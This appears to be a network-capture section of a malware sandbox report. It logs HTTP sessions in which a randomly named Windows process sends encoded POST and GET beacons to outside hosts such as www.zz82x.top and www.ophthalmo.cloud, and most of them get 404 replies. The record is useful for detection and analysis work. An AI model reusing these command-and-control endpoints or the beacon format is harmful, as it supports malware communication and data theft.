                                          Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                           Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                           2 | 192.168.2.8 | 49749 | 38.47.232.196 | 80 | 3164 | C:\Program Files (x86)\VFEnTIqdxoPLQMpedaWkbDHwMhQJAtjMHViLFByrHORVEofjn\WNGaDiurNI.exe
                                           Timestamp | Bytes transferred | Direction | Data
                                           Dec 5, 2024 18:22:40.738253117 CET | 789 | OUT | POST /fk06/ HTTP/1.1
                                          Host: www.zz82x.top
                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                          Accept-Language: en-US,en;q=0.9
                                          Accept-Encoding: gzip, deflate, br
                                          Origin: http://www.zz82x.top
                                          Connection: close
                                          Content-Length: 228
                                          Cache-Control: max-age=0
                                          Content-Type: application/x-www-form-urlencoded
                                          Referer: http://www.zz82x.top/fk06/
                                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                          Data Raw: 44 54 73 34 43 44 34 3d 33 77 79 47 57 4a 61 35 30 65 4a 36 6c 37 46 69 6e 47 38 68 48 44 73 58 49 68 35 4c 4b 70 43 50 6c 52 55 38 43 69 74 79 56 67 61 34 51 33 47 63 65 56 42 73 57 7a 62 43 74 44 45 32 53 73 69 34 4a 32 7a 2b 38 71 71 4e 42 52 51 77 79 55 6c 70 74 67 47 2f 32 64 6a 74 44 43 4b 4e 7a 35 4b 39 62 70 34 6f 38 6b 59 66 46 4e 42 78 55 42 4f 42 30 4a 73 57 47 77 57 51 78 78 73 75 7a 77 73 41 56 70 2f 42 74 76 42 4c 2f 47 4c 5a 6d 76 58 69 49 55 49 44 46 75 6a 2b 49 5a 4c 2f 59 64 65 51 35 62 6b 6a 77 53 54 64 56 59 61 58 4a 66 50 6b 55 47 30 56 47 4b 4d 61 50 62 4e 58 43 4e 57 53 38 48 47 57 41 6b 59 41 6b 67 7a 76 2b 75 46 6b 33 64 6f 6c 72 37 47 41 50 30 70 48
                                          Data Ascii: DTs4CD4=3wyGWJa50eJ6l7FinG8hHDsXIh5LKpCPlRU8CityVga4Q3GceVBsWzbCtDE2Ssi4J2z+8qqNBRQwyUlptgG/2djtDCKNz5K9bp4o8kYfFNBxUBOB0JsWGwWQxxsuzwsAVp/BtvBL/GLZmvXiIUIDFuj+IZL/YdeQ5bkjwSTdVYaXJfPkUG0VGKMaPbNXCNWS8HGWAkYAkgzv+uFk3dolr7GAP0pH


                                           Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                           3 | 192.168.2.8 | 49755 | 38.47.232.196 | 80 | 3164 | C:\Program Files (x86)\VFEnTIqdxoPLQMpedaWkbDHwMhQJAtjMHViLFByrHORVEofjn\WNGaDiurNI.exe
                                           Timestamp | Bytes transferred | Direction | Data
                                           Dec 5, 2024 18:22:43.392133951 CET | 1806 | OUT | POST /fk06/ HTTP/1.1
                                          Host: www.zz82x.top
                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                          Accept-Language: en-US,en;q=0.9
                                          Accept-Encoding: gzip, deflate, br
                                          Origin: http://www.zz82x.top
                                          Connection: close
                                          Content-Length: 1244
                                          Cache-Control: max-age=0
                                          Content-Type: application/x-www-form-urlencoded
                                          Referer: http://www.zz82x.top/fk06/
                                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                          Data Raw: 44 54 73 34 43 44 34 3d 33 77 79 47 57 4a 61 35 30 65 4a 36 6c 37 46 69 6e 47 38 68 48 44 73 58 49 68 35 4c 4b 70 43 50 6c 52 55 38 43 69 74 79 56 67 43 34 51 6d 6d 63 66 79 56 73 45 6a 62 43 7a 54 45 7a 53 73 6a 34 4a 32 72 68 38 71 6e 34 42 53 34 77 79 32 74 70 35 46 79 2f 34 74 6a 74 63 53 4b 49 2b 5a 4b 73 62 70 6f 6b 38 6b 49 66 46 4e 42 78 55 44 57 42 78 6f 73 57 41 77 57 58 35 52 73 69 6b 41 73 6f 56 70 6e 2f 74 76 46 62 2b 32 72 5a 6c 4c 4c 69 4c 6e 73 44 61 65 6a 34 63 35 4c 33 59 64 54 4f 35 62 4a 63 77 54 33 7a 56 61 4b 58 49 70 79 37 4e 58 31 4a 61 73 51 46 4d 71 39 30 4d 75 71 68 79 31 48 6d 45 56 30 75 71 33 2f 38 2b 50 51 72 39 50 68 74 35 63 4f 70 42 68 73 55 73 68 52 4a 74 39 43 78 54 59 6c 2f 30 57 76 53 6a 6a 74 6c 4f 37 71 73 6b 46 2b 69 66 5a 6d 45 32 59 47 76 6d 4b 51 72 72 6c 79 6b 6c 30 6b 44 62 32 46 58 46 71 6b 58 31 4c 61 4c 6e 46 32 6c 4a 45 36 74 77 74 62 75 63 71 4b 37 48 6f 45 68 62 63 6a 36 55 72 74 67 30 4c 66 38 58 72 6e 54 72 32 67 7a 30 46 6e 72 37 64 6b 4e 7a 61 [TRUNCATED]
                                          Data Ascii: DTs4CD4=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 [TRUNCATED]
                                           Dec 5, 2024 18:22:44.920101881 CET | 691 | IN | HTTP/1.1 404 Not Found
                                          Server: nginx
                                          Date: Thu, 05 Dec 2024 17:22:44 GMT
                                          Content-Type: text/html
                                          Content-Length: 548
                                          Connection: close
                                          Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED]
                                          Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                           Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                           4 | 192.168.2.8 | 49764 | 38.47.232.196 | 80 | 3164 | C:\Program Files (x86)\VFEnTIqdxoPLQMpedaWkbDHwMhQJAtjMHViLFByrHORVEofjn\WNGaDiurNI.exe
                                           Timestamp | Bytes transferred | Direction | Data
                                           Dec 5, 2024 18:22:46.046241045 CET | 510 | OUT | GET /fk06/?v4=NRh8&DTs4CD4=6yamV9jmlYISo7pFsUNUJnURbxlWMYSXh3BqDS1TUCORGSKgOxEODjfkqzZEFLLIdUGYwb6HBQxj6hxrw3bE5aW7dF6zoZiXL70TyEdlD9ZsDXa5xNUzKEaTljshjAVXAQ== HTTP/1.1
                                          Host: www.zz82x.top
                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                          Accept-Language: en-US,en;q=0.9
                                          Connection: close
                                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                           Dec 5, 2024 18:22:47.592560053 CET | 691 | IN | HTTP/1.1 404 Not Found
                                          Server: nginx
                                          Date: Thu, 05 Dec 2024 17:22:47 GMT
                                          Content-Type: text/html
                                          Content-Length: 548
                                          Connection: close
                                          Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED]
                                          Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                           Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                           5 | 192.168.2.8 | 49782 | 217.160.0.207 | 80 | 3164 | C:\Program Files (x86)\VFEnTIqdxoPLQMpedaWkbDHwMhQJAtjMHViLFByrHORVEofjn\WNGaDiurNI.exe
                                           Timestamp | Bytes transferred | Direction | Data
                                           Dec 5, 2024 18:22:53.261367083 CET | 787 | OUT | POST /mgg3/ HTTP/1.1
                                          Host: www.ophthalmo.cloud
                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                          Accept-Language: en-US,en;q=0.9
                                          Accept-Encoding: gzip, deflate, br
                                          Origin: http://www.ophthalmo.cloud
                                          Connection: close
                                          Content-Length: 208
                                          Cache-Control: max-age=0
                                          Content-Type: application/x-www-form-urlencoded
                                          Referer: http://www.ophthalmo.cloud/mgg3/
                                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                          Data Raw: 44 54 73 34 43 44 34 3d 74 47 71 63 4a 51 75 33 69 4f 6e 6f 70 4d 50 46 43 68 37 66 31 70 67 4f 4c 33 49 52 73 6b 67 63 35 30 2b 4a 55 68 44 30 75 50 6b 6f 77 32 53 4c 6b 62 35 41 4d 4e 78 52 65 66 6f 4a 56 73 48 79 74 4c 50 31 4d 49 78 73 58 72 66 52 71 78 63 7a 4d 5a 64 6a 7a 32 35 6c 34 2f 4b 46 50 47 6b 71 2f 36 66 4a 32 37 48 77 2f 50 62 58 31 68 6f 46 59 78 68 46 57 67 41 41 69 33 6a 31 69 36 39 39 79 55 56 51 41 56 4e 66 53 6c 61 35 79 53 2f 44 53 4c 38 6b 79 39 72 6d 2f 58 76 4d 63 53 41 37 46 64 6b 4f 33 66 6c 54 41 49 2f 39 33 65 50 73 34 70 67 45 41 6c 71 38 43 2b 73 37 77 52 75 45 4d 6e 64 6f 6d 69 77 3d
                                          Data Ascii: DTs4CD4=tGqcJQu3iOnopMPFCh7f1pgOL3IRskgc50+JUhD0uPkow2SLkb5AMNxRefoJVsHytLP1MIxsXrfRqxczMZdjz25l4/KFPGkq/6fJ27Hw/PbX1hoFYxhFWgAAi3j1i699yUVQAVNfSla5yS/DSL8ky9rm/XvMcSA7FdkO3flTAI/93ePs4pgEAlq8C+s7wRuEMndomiw=
                                           Dec 5, 2024 18:22:54.540719032 CET | 779 | IN | HTTP/1.1 404 Not Found
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: close
                                          Date: Thu, 05 Dec 2024 17:22:54 GMT
                                          Server: Apache
                                          X-Frame-Options: deny
                                          Content-Encoding: gzip
                                          Data Raw: 32 33 39 0d 0a 1f 8b 08 00 00 00 00 00 00 03 85 54 4d 6f d3 40 10 bd f7 57 4c 8d 50 40 c4 71 7a 43 89 dd 03 b4 54 20 a8 2b 35 12 42 e2 b2 f6 8e ed 69 ed dd 68 77 9d 0f 10 ff 9d f1 3a 91 12 e2 92 5c a2 9d 8f f7 76 df 9b 71 7c 79 93 7e 5c fc 78 b8 85 ca 35 f5 f5 45 dc ff 41 5c a1 90 d7 17 00 71 83 4e 40 5e 09 63 d1 25 41 eb 8a f0 7d e0 13 d6 6d 6b 04 b7 5d 62 12 38 dc b8 28 b7 d6 67 3c d4 18 32 2d b7 63 78 b5 14 c6 29 34 63 a0 c2 88 06 e1 37 83 1e ff 2a a4 b2 72 b3 ab e9 f4 f5 fc 24 b9 26 e9 aa 17 72 8d 30 25 a9 d9 f4 b4 6b 29 a4 24 55 0e a5 32 6d 24 9a a1 8c 6e 5d 4d 0a 87 52 85 56 2e b4 f4 0b 5f b8 c9 0a 8d a3 5c d4 a1 a8 a9 54 b3 4c 58 ec a0 4e 2f 96 89 fc b9 34 ba 55 72 e6 8c 50 96 d5 41 e5 8e eb fe 1c 89 d0 c9 38 20 9a 66 ca a2 d6 eb 59 45 52 a2 3a 45 88 23 6f d0 81 87 fc 06 e6 4a 82 fb f4 7b 00 8a bd 48 02 dc 2c c9 60 6f db ce e9 7d 15 29 89 9b 31 14 ba 66 96 31 88 ba de 37 dd a5 e9 dd d7 db 0f e9 a2 9f 83 7e 40 ce b7 19 9d 69 b7 a3 ba 0c 43 f8 e4 91 d9 25 f8 c6 23 16 2e 44 09 05 6d d0 82 65 21 [TRUNCATED]
                                          Data Ascii: 239TMo@WLP@qzCT +5Bihw:\vq|y~\x5EA\qN@^c%A}mk]b8(g<2-cx)4c7*r$&r0%k)$U2m$n]MRV._\TLXN/4UrPA8 fYER:E#oJ{H,`o})1f17~@iC%#.Dme!9-Fg&qE9GpU~P$9"GJd:FliPkj:sE^jgn!O/i$`7G}p=J~K9|sd~AFqlEN~aG`dMQdQj3k=u5^OjGZM*m0>}|)on:'RFBW+}c_0


                                           Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                           6 | 192.168.2.8 | 49788 | 217.160.0.207 | 80 | 3164 | C:\Program Files (x86)\VFEnTIqdxoPLQMpedaWkbDHwMhQJAtjMHViLFByrHORVEofjn\WNGaDiurNI.exe
                                           Timestamp | Bytes transferred | Direction | Data
                                           Dec 5, 2024 18:22:55.925795078 CET | 807 | OUT | POST /mgg3/ HTTP/1.1
                                          Host: www.ophthalmo.cloud
                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                          Accept-Language: en-US,en;q=0.9
                                          Accept-Encoding: gzip, deflate, br
                                          Origin: http://www.ophthalmo.cloud
                                          Connection: close
                                          Content-Length: 228
                                          Cache-Control: max-age=0
                                          Content-Type: application/x-www-form-urlencoded
                                          Referer: http://www.ophthalmo.cloud/mgg3/
                                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                          Data Raw: 44 54 73 34 43 44 34 3d 74 47 71 63 4a 51 75 33 69 4f 6e 6f 72 74 2f 46 45 43 6a 66 2b 70 67 4e 4f 33 49 52 32 55 68 58 35 30 69 4a 55 6a 76 6b 75 64 51 6f 7a 58 69 4c 6e 61 35 41 42 74 78 52 52 2f 6f 56 4b 38 48 70 74 4c 44 44 4d 4d 78 73 58 74 7a 52 71 77 73 7a 4c 75 78 6b 7a 6d 35 6a 77 66 4b 44 58 6d 6b 71 2f 36 66 4a 32 37 6a 57 2f 50 44 58 30 56 73 46 59 54 4a 47 58 67 41 50 6c 33 6a 31 70 61 39 35 79 55 55 31 41 51 73 43 53 6e 69 35 79 53 50 44 53 36 38 6a 34 39 72 67 78 33 75 2b 61 41 42 70 46 73 30 6f 78 70 74 38 4e 4a 32 48 32 6f 69 47 69 4c 6f 43 44 6c 43 58 43 39 45 4e 31 6d 7a 73 57 45 4e 59 34 31 6b 72 7a 6e 69 70 57 66 71 37 30 49 76 39 75 50 6a 4a 35 35 6c 68
                                          Data Ascii: DTs4CD4=tGqcJQu3iOnort/FECjf+pgNO3IR2UhX50iJUjvkudQozXiLna5ABtxRR/oVK8HptLDDMMxsXtzRqwszLuxkzm5jwfKDXmkq/6fJ27jW/PDX0VsFYTJGXgAPl3j1pa95yUU1AQsCSni5ySPDS68j49rgx3u+aABpFs0oxpt8NJ2H2oiGiLoCDlCXC9EN1mzsWENY41krznipWfq70Iv9uPjJ55lh
                                           Dec 5, 2024 18:22:57.208271027 CET | 779 | IN | HTTP/1.1 404 Not Found
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: close
                                          Date: Thu, 05 Dec 2024 17:22:57 GMT
                                          Server: Apache
                                          X-Frame-Options: deny
                                          Content-Encoding: gzip
                                          Data Raw: 32 33 39 0d 0a 1f 8b 08 00 00 00 00 00 00 03 85 54 4d 6f d3 40 10 bd f7 57 4c 8d 50 40 c4 71 7a 43 89 dd 03 b4 54 20 a8 2b 35 12 42 e2 b2 f6 8e ed 69 ed dd 68 77 9d 0f 10 ff 9d f1 3a 91 12 e2 92 5c a2 9d 8f f7 76 df 9b 71 7c 79 93 7e 5c fc 78 b8 85 ca 35 f5 f5 45 dc ff 41 5c a1 90 d7 17 00 71 83 4e 40 5e 09 63 d1 25 41 eb 8a f0 7d e0 13 d6 6d 6b 04 b7 5d 62 12 38 dc b8 28 b7 d6 67 3c d4 18 32 2d b7 63 78 b5 14 c6 29 34 63 a0 c2 88 06 e1 37 83 1e ff 2a a4 b2 72 b3 ab e9 f4 f5 fc 24 b9 26 e9 aa 17 72 8d 30 25 a9 d9 f4 b4 6b 29 a4 24 55 0e a5 32 6d 24 9a a1 8c 6e 5d 4d 0a 87 52 85 56 2e b4 f4 0b 5f b8 c9 0a 8d a3 5c d4 a1 a8 a9 54 b3 4c 58 ec a0 4e 2f 96 89 fc b9 34 ba 55 72 e6 8c 50 96 d5 41 e5 8e eb fe 1c 89 d0 c9 38 20 9a 66 ca a2 d6 eb 59 45 52 a2 3a 45 88 23 6f d0 81 87 fc 06 e6 4a 82 fb f4 7b 00 8a bd 48 02 dc 2c c9 60 6f db ce e9 7d 15 29 89 9b 31 14 ba 66 96 31 88 ba de 37 dd a5 e9 dd d7 db 0f e9 a2 9f 83 7e 40 ce b7 19 9d 69 b7 a3 ba 0c 43 f8 e4 91 d9 25 f8 c6 23 16 2e 44 09 05 6d d0 82 65 21 [TRUNCATED]
                                          Data Ascii: 239TMo@WLP@qzCT +5Bihw:\vq|y~\x5EA\qN@^c%A}mk]b8(g<2-cx)4c7*r$&r0%k)$U2m$n]MRV._\TLXN/4UrPA8 fYER:E#oJ{H,`o})1f17~@iC%#.Dme!9-Fg&qE9GpU~P$9"GJd:FliPkj:sE^jgn!O/i$`7G}p=J~K9|sd~AFqlEN~aG`dMQdQj3k=u5^OjGZM*m0>}|)on:'RFBW+}c_0


                                          Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                          7           192.168.2.8  49794        217.160.0.207   80                3164  C:\Program Files (x86)\VFEnTIqdxoPLQMpedaWkbDHwMhQJAtjMHViLFByrHORVEofjn\WNGaDiurNI.exe

                                          Timestamp                           Bytes transferred  Direction  Data
                                          Dec 5, 2024 18:22:58.593518972 CET  1824               OUT        POST /mgg3/ HTTP/1.1
                                          Host: www.ophthalmo.cloud
                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                          Accept-Language: en-US,en;q=0.9
                                          Accept-Encoding: gzip, deflate, br
                                          Origin: http://www.ophthalmo.cloud
                                          Connection: close
                                          Content-Length: 1244
                                          Cache-Control: max-age=0
                                          Content-Type: application/x-www-form-urlencoded
                                          Referer: http://www.ophthalmo.cloud/mgg3/
                                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                          Data Raw: 44 54 73 34 43 44 34 3d 74 47 71 63 4a 51 75 33 69 4f 6e 6f 72 74 2f 46 45 43 6a 66 2b 70 67 4e 4f 33 49 52 32 55 68 58 35 30 69 4a 55 6a 76 6b 75 64 49 6f 77 68 65 4c 31 35 42 41 41 74 78 52 59 66 6f 57 4b 38 47 37 74 4c 62 66 4d 4e 4d 4f 58 75 48 52 6c 32 34 7a 4f 63 4a 6b 38 6d 35 6a 79 66 4b 43 50 47 6c 69 2f 36 50 4e 32 37 7a 57 2f 50 44 58 30 55 63 46 52 68 68 47 61 41 41 41 69 33 6a 79 69 36 39 52 79 51 34 44 41 51 70 31 56 58 43 35 38 57 6a 44 55 59 6b 6a 6c 4e 72 69 79 33 75 6d 61 41 4d 33 46 73 6f 4f 78 70 78 57 4e 4f 36 48 37 5a 48 61 77 50 77 2b 59 56 57 48 4d 71 55 54 2b 68 47 4d 66 79 64 57 6c 55 59 7a 2f 43 75 66 57 2b 50 7a 78 5a 36 51 34 5a 7a 6a 6f 65 4d 4d 6f 39 30 69 32 62 2f 42 35 6b 74 74 56 67 57 68 4b 38 46 71 36 35 66 74 6c 34 57 71 73 52 72 31 4f 33 35 4d 58 67 75 62 78 39 55 57 4c 57 75 67 34 6a 7a 48 62 2b 66 54 5a 47 4d 76 74 45 4a 59 4f 51 4c 77 75 62 69 50 6f 35 72 63 53 31 50 79 65 56 48 7a 44 75 4d 6c 55 4c 7a 66 4b 79 65 43 6b 2f 47 75 6e 75 49 76 7a 34 48 4a 46 57 [TRUNCATED]
                                          Data Ascii: DTs4CD4=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 [TRUNCATED]
                                          Dec 5, 2024 18:22:59.976537943 CET  779  IN  HTTP/1.1 404 Not Found
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: close
                                          Date: Thu, 05 Dec 2024 17:22:59 GMT
                                          Server: Apache
                                          X-Frame-Options: deny
                                          Content-Encoding: gzip
                                          Data Raw: 32 33 39 0d 0a 1f 8b 08 00 00 00 00 00 00 03 85 54 4d 6f d3 40 10 bd f7 57 4c 8d 50 40 c4 71 7a 43 89 dd 03 b4 54 20 a8 2b 35 12 42 e2 b2 f6 8e ed 69 ed dd 68 77 9d 0f 10 ff 9d f1 3a 91 12 e2 92 5c a2 9d 8f f7 76 df 9b 71 7c 79 93 7e 5c fc 78 b8 85 ca 35 f5 f5 45 dc ff 41 5c a1 90 d7 17 00 71 83 4e 40 5e 09 63 d1 25 41 eb 8a f0 7d e0 13 d6 6d 6b 04 b7 5d 62 12 38 dc b8 28 b7 d6 67 3c d4 18 32 2d b7 63 78 b5 14 c6 29 34 63 a0 c2 88 06 e1 37 83 1e ff 2a a4 b2 72 b3 ab e9 f4 f5 fc 24 b9 26 e9 aa 17 72 8d 30 25 a9 d9 f4 b4 6b 29 a4 24 55 0e a5 32 6d 24 9a a1 8c 6e 5d 4d 0a 87 52 85 56 2e b4 f4 0b 5f b8 c9 0a 8d a3 5c d4 a1 a8 a9 54 b3 4c 58 ec a0 4e 2f 96 89 fc b9 34 ba 55 72 e6 8c 50 96 d5 41 e5 8e eb fe 1c 89 d0 c9 38 20 9a 66 ca a2 d6 eb 59 45 52 a2 3a 45 88 23 6f d0 81 87 fc 06 e6 4a 82 fb f4 7b 00 8a bd 48 02 dc 2c c9 60 6f db ce e9 7d 15 29 89 9b 31 14 ba 66 96 31 88 ba de 37 dd a5 e9 dd d7 db 0f e9 a2 9f 83 7e 40 ce b7 19 9d 69 b7 a3 ba 0c 43 f8 e4 91 d9 25 f8 c6 23 16 2e 44 09 05 6d d0 82 65 21 [TRUNCATED]
                                          Data Ascii: 239TMo@WLP@qzCT +5Bihw:\vq|y~\x5EA\qN@^c%A}mk]b8(g<2-cx)4c7*r$&r0%k)$U2m$n]MRV._\TLXN/4UrPA8 fYER:E#oJ{H,`o})1f17~@iC%#.Dme!9-Fg&qE9GpU~P$9"GJd:FliPkj:sE^jgn!O/i$`7G}p=J~K9|sd~AFqlEN~aG`dMQdQj3k=u5^OjGZM*m0>}|)on:'RFBW+}c_0


                                          Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                          8           192.168.2.8  49803        217.160.0.207   80                3164  C:\Program Files (x86)\VFEnTIqdxoPLQMpedaWkbDHwMhQJAtjMHViLFByrHORVEofjn\WNGaDiurNI.exe

                                          Timestamp                           Bytes transferred  Direction  Data
                                          Dec 5, 2024 18:23:01.386142969 CET  516                OUT        GET /mgg3/?DTs4CD4=gEC8KgLUidSdu/LaJDm0wdgPKykh22cq0AnLcRTEvs4H+h+Cn5seN/p6ZNIXUcjC7qbBK+lucO22lGJyLeY23gB1m4CBXHBSkrnrwKbx/qmY6AwmTWdie10g6VbJmKkWlw==&v4=NRh8 HTTP/1.1
                                          Host: www.ophthalmo.cloud
                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                          Accept-Language: en-US,en;q=0.9
                                          Connection: close
                                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                          Dec 5, 2024 18:23:02.597970963 CET  1236  IN  HTTP/1.1 404 Not Found
                                          Content-Type: text/html
                                          Content-Length: 1271
                                          Connection: close
                                          Date: Thu, 05 Dec 2024 17:23:02 GMT
                                          Server: Apache
                                          X-Frame-Options: deny
                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 68 74 6d 6c 2c 20 62 6f 64 79 2c 20 23 70 61 72 74 6e 65 72 2c 20 69 66 72 61 6d 65 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3a 31 30 30 25 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3a 31 30 30 25 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 72 64 65 72 3a 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6f 75 74 6c 69 6e 65 3a 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 30 30 25 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 76 65 72 74 69 63 61 6c 2d 61 6c [TRUNCATED]
